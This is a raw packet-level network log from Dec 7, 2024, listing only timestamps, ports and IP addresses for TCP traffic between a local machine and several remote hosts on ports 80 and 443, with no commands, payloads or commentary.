Dec 7, 2024 12:59:53.326795101 CET	443	49813	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.327079058 CET	49813	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.329797983 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.329823017 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.329907894 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.330075026 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:53.330085993 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:53.383656979 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.383797884 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.383845091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.383886099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.384083986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.384131908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.384413958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.384450912 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.384622097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.385004044 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.385034084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.385292053 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.385332108 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.385507107 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.385916948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.385960102 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.386178017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.386223078 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.386729956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.386778116 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.386908054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.386950016 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.387552977 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.387595892 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.387736082 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.387774944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.388422012 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.388464928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.388612986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.388653040 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.389163971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.389204025 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.389363050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.389400959 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.389992952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.390034914 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.390191078 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.390229940 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.390819073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.390860081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.390996933 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.391036034 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.391622066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.391663074 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.391833067 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.391877890 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.392457962 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.392501116 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.392741919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.392784119 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.393279076 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.393323898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.393492937 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.393533945 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.394146919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.394191980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.394304991 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.394344091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.394920111 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.394961119 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.395134926 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.395174026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.395765066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.395807981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.395951033 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.395991087 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.396585941 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.396625996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.396773100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.396815062 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.397406101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.397447109 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.397607088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.397646904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.398231030 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.398272038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.398427010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.398468971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.399058104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.399100065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.399277925 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.399337053 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.399879932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.400104046 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.400150061 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.400741100 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.401030064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.401067019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.401576996 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.401618958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.401765108 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.402367115 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.402404070 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.402576923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.403228045 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.403285027 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.403549910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.403592110 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.404112101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.404155970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.404237986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.404299974 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.404808998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.404887915 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.405014038 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.405168056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.405613899 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.405740023 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.405822039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.405886889 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.406454086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.406730890 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.406757116 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.406776905 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.407278061 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.407588959 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.407628059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.408157110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.408324957 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.408365965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.408968925 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.409012079 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.409135103 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.410641909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.851003885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.851049900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:53.970848083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:53.970870018 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:54.182465076 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.217189074 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.217216969 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.224704981 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.224711895 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.462531090 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.464072943 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.504690886 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.504724026 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.508393049 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.508408070 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.508740902 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.518403053 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.518412113 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.532529116 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.532537937 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.586116076 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.592643023 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.592679024 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.607791901 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.607815981 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.713071108 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.713099957 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.713169098 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.713188887 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.713231087 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.717581034 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.717586994 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.717601061 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.717756033 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.717787981 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.717829943 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.792304993 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:54.792387009 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:54.797364950 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.797398090 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.797472000 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.818881989 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.818895102 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.898482084 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.901141882 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.901196957 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.902112961 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.902136087 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.902188063 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.902205944 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.903228998 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.903275967 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.912367105 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.912381887 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.912393093 CET	49816	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.912398100 CET	443	49816	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.991852045 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.991880894 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:54.991892099 CET	49815	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:54.991898060 CET	443	49815	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.020072937 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.023897886 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.023967981 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.104387999 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.105608940 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.105635881 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.105706930 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.119117975 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.119151115 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.119163990 CET	49817	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.119170904 CET	443	49817	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.131865025 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.131897926 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.131958008 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.133944035 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.133970976 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.135020018 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.135026932 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.135389090 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.135404110 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.136817932 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.136831999 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.138844967 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.138854980 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.138906956 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.139158010 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.139172077 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.192065954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.311852932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:55.538841009 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.542532921 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.542584896 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.542691946 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.542702913 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.542715073 CET	49818	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.542718887 CET	443	49818	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.545485020 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.545516968 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.545598030 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.545713902 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:55.545728922 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:55.637667894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:55.637753963 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.637939930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:55.637995005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.830151081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:55.830241919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.830426931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:55.830483913 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.832945108 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:55.952656984 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:56.278039932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:56.281533957 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:56.298132896 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:56.418670893 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:56.532097101 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.533719063 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.533755064 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.534207106 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.534212112 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.851250887 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.851250887 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.851763964 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.851777077 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.851778984 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.851793051 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.852230072 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.852236032 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.852272034 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.852276087 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.853988886 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.854398966 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.854406118 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.854768991 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.854773045 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.973162889 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.973253012 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.973335981 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.973520041 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.973542929 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.973560095 CET	49819	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.973567009 CET	443	49819	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.975958109 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.975991011 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:56.976070881 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.976200104 CET	49824	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:56.976214886 CET	443	49824	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.231245041 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:57.231391907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:57.258877039 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:57.269643068 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.270409107 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.270425081 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.270879984 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.270885944 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.328125000 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.328938961 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.329019070 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.329088926 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.329106092 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.329116106 CET	49821	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.329122066 CET	443	49821	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.332045078 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.332066059 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.332170010 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.332331896 CET	49825	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.332345963 CET	443	49825	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.333471060 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.333565950 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.333621025 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.333720922 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.333734989 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.333745003 CET	49822	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.333750010 CET	443	49822	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.335902929 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.335928917 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.335999012 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.336142063 CET	49826	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.336155891 CET	443	49826	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.374217033 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.374296904 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.374371052 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.374587059 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.374592066 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.374602079 CET	49820	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.374607086 CET	443	49820	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.377693892 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.377703905 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.377785921 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.377958059 CET	49827	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.377966881 CET	443	49827	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.379007101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:57.703552961 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.704978943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:57.705059052 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:57.707113981 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.707187891 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.713805914 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.713835955 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.713850975 CET	49823	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.713857889 CET	443	49823	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.717367887 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.717401981 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.717468977 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.718578100 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:57.718591928 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:57.719167948 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:57.838928938 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:57.839083910 CET	49829	80	192.168.2.7	185.215.113.16
